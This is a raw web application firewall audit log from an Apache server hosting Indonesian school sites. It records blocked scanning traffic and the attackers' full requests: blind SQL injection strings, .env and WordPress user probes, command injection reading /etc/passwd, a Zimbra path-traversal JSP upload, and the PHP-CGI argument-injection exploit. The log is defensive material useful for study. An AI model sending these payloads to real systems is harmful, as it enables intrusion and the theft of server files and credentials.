[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||127.0.0.1|F|2"] [data "Matched Data: select 1,111*111,USER found within REQUEST_URI: /ncchr/attendScript/internal/runScript"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873245040743 2965 (- - -) Stopwatch2: 1747873245040743 2965; combined=1759, p1=432, p2=1297, p3=0, p4=0, p5=30, sr=130, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3e19d36-Z-- --3ac5230c-A-- [22/May/2025:07:20:47 +0700] aC5t32friXjg62qQwE_legAAAJI 103.236.140.4 34116 103.236.140.4 8181 --3ac5230c-B-- POST /newsedit/newsplan/task/binary.do HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 166 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 168117893 --3ac5230c-C-- TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+'0:0:3';select+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1 --3ac5230c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ac5230c-E-- --3ac5230c-H-- 
Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /newsedit/newsplan/task/binary.do"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873247053599 3241 (- - -) Stopwatch2: 1747873247053599 3241; combined=2058, p1=397, p2=1628, p3=0, p4=0, p5=33, sr=110, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ac5230c-Z-- --b21db840-A-- [22/May/2025:07:25:59 +0700] aC5vF30O04WKE1HJ5iT_BQAAAAI 103.236.140.4 34526 103.236.140.4 8181 --b21db840-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.114 Safari/537.36 Puffin/4.5.0IT Accept-Charset: utf-8 --b21db840-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b21db840-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747873559517830 706 (- - -) Stopwatch2: 1747873559517830 706; combined=306, p1=265, p2=0, p3=0, p4=0, p5=41, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b21db840-Z-- --94c70330-A-- [22/May/2025:07:47:28 +0700] aC50IH0O04WKE1HJ5iQAEgAAABM 103.236.140.4 36184 103.236.140.4 8181 --94c70330-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.130.110.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.130.110.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --94c70330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94c70330-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747874848696600 2894 (- - -) Stopwatch2: 1747874848696600 2894; combined=1388, p1=472, p2=882, p3=0, p4=0, p5=34, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94c70330-Z-- --f4002618-A-- [22/May/2025:07:48:22 +0700] aC50VmfriXjg62qQwE_mHwAAAIA 103.236.140.4 36258 103.236.140.4 8181 --f4002618-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --f4002618-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4002618-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747874902083180 820 (- - -) Stopwatch2: 1747874902083180 820; combined=347, p1=307, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4002618-Z-- --0b7f3272-A-- [22/May/2025:07:52:47 +0700] aC51X30O04WKE1HJ5iQASAAAAA4 103.236.140.4 36606 103.236.140.4 8181 --0b7f3272-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0b7f3272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b7f3272-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747875167613496 3527 (- - -) Stopwatch2: 1747875167613496 3527; combined=1560, p1=532, p2=996, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7f3272-Z-- --096fe637-A-- [22/May/2025:08:06:57 +0700] aC54sSektx75wRFPQyiBlQAAAMM 103.236.140.4 41112 103.236.140.4 8181 --096fe637-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: sid=foo X-Varnish: 166330677 --096fe637-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --096fe637-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --096fe637-E-- --096fe637-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876017507710 2639 (- - -) Stopwatch2: 1747876017507710 2639; combined=1488, p1=358, p2=1103, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --096fe637-Z-- --65165c6c-A-- [22/May/2025:08:06:58 +0700] aC54siektx75wRFPQyiBlgAAAME 103.236.140.4 41118 103.236.140.4 8181 --65165c6c-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168119869 --65165c6c-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --65165c6c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65165c6c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876018122672 4895 (- - -) Stopwatch2: 1747876018122672 4895; combined=3565, p1=428, p2=3108, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65165c6c-Z-- --add4a712-A-- [22/May/2025:08:06:58 +0700] aC54smfriXjg62qQwE_oaQAAAIM 103.236.140.4 41122 103.236.140.4 8181 --add4a712-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 166330685 --add4a712-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ 
Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --add4a712-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --add4a712-E-- --add4a712-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876018154587 4414 (- - -) Stopwatch2: 1747876018154587 4414; combined=3301, p1=344, p2=2925, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --add4a712-Z-- --bd726b5c-A-- [22/May/2025:08:12:46 +0700] aC56Dn0O04WKE1HJ5iQCzQAAABg 103.236.140.4 41448 103.236.140.4 8181 --bd726b5c-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 166330831 --bd726b5c-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --bd726b5c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd726b5c-E-- --bd726b5c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747876366796056 2306 (- - -) Stopwatch2: 1747876366796056 2306; combined=700, p1=522, p2=137, p3=0, p4=0, p5=41, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd726b5c-Z-- --e4a28c42-A-- [22/May/2025:08:19:01 +0700] aC57heThJmFSRJ5-OZdblgAAAFI 103.236.140.4 41774 103.236.140.4 8181 --e4a28c42-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e4a28c42-C-- --e4a28c42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4a28c42-E-- --e4a28c42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876741319200 4042 (- - -) Stopwatch2: 1747876741319200 4042; combined=2178, p1=482, p2=1655, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4a28c42-Z-- --ff991c3c-A-- [22/May/2025:08:29:46 +0700] aC5-CmfriXjg62qQwE_otgAAAJc 103.236.140.4 42586 103.236.140.4 8181 --ff991c3c-B-- GET /attachment?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168598627 --ff991c3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ff991c3c-E-- --ff991c3c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /attachment?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877386693450 2825 (- - -) Stopwatch2: 1747877386693450 2825; combined=684, p1=527, p2=125, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff991c3c-Z-- --aa19cb3a-A-- [22/May/2025:08:30:05 +0700] aC5-HWfriXjg62qQwE_ovQAAAIg 103.236.140.4 42606 103.236.140.4 8181 --aa19cb3a-B-- GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 166625971 --aa19cb3a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa19cb3a-E-- --aa19cb3a-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877405270617 3562 (- - -) Stopwatch2: 1747877405270617 3562; combined=1785, p1=491, p2=1260, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa19cb3a-Z-- --1d1ec367-A-- [22/May/2025:08:30:05 +0700] aC5-HWfriXjg62qQwE_ovgAAAIA 103.236.140.4 42606 103.236.140.4 8181 --1d1ec367-B-- GET /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168598639 --1d1ec367-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1d1ec367-E-- --1d1ec367-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877405275980 2169 (- - -) Stopwatch2: 1747877405275980 2169; combined=1239, p1=329, p2=883, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
